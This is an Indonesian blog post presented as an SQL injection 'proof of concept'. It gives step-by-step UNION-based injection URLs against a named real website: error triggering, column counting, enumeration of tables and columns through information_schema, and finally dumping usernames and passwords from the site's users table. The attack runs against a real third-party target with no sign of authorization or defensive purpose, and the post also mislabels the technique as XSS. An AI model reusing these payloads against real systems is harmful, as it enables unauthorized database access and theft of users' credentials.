SQL injection  

Posted

SQL injection
Proof of Concept (pembuktian)
###################################
Apa itu xss attack??? silakan cari disini : google.com atau jasakom.com

target :http://www.pmn.or.id
link :http://www.pmn.or.id/home_details_ind.php?id=14


1.memunculkan error: http://www.pmn.or.id/home_details_ind.php?id=14'


2.Memeriksa jumlah field dari suatu tabel:
->http://www.pmn.or.id/home_details_ind.php?id=14 order by 6-- #gk error#
->http://www.pmn.or.id/home_details_ind.php?id=14 order by 7-- #error#

3.Mengeluarkan nomor field untuk menampilkan informasi yang diinginkan: http://www.pmn.or.id/home_details_ind.php?id=-14%20union%20select%201,2,3,4,5,6--


4.mengeluarkan nama-nama tabel: http://www.pmn.or.id/home_details_ind.php?id=-14%20union%20select%201,2,3,4,group_concat(version(),0x3a,table_name),6%20from%20information_schema.tables%20where%20table_schema=database()--

terlihat disana nama2 tabelnya dan versi database yg digunakan (versi
5.0.38-Debian_1)


5.memunculkan nama field dari tabel users: http://www.pmn.or.id/home_details_ind.php?id=-14%20union%20select%201,2,3,4,group_concat(column_name),6%20from%20information_schema.columns%20where%20table_name=0x7573657273--

nama tabel,yakni dlm hal ini users,harus dikonversikan ke hex,, untuk mengubah string ke hex,silahkan kesini http://www.string-functions.com/string-hex.aspx

5.Langkah terakhir kita akan mengeluarkan record-record dari tabel users: http://www.pmn.or.id/home_details_ind.php?id=-14%20union%20select%201,2,3,4,group_concat(id,0x3a,name,0x3a,password),6%20from%20users--

0 comments

Posting Komentar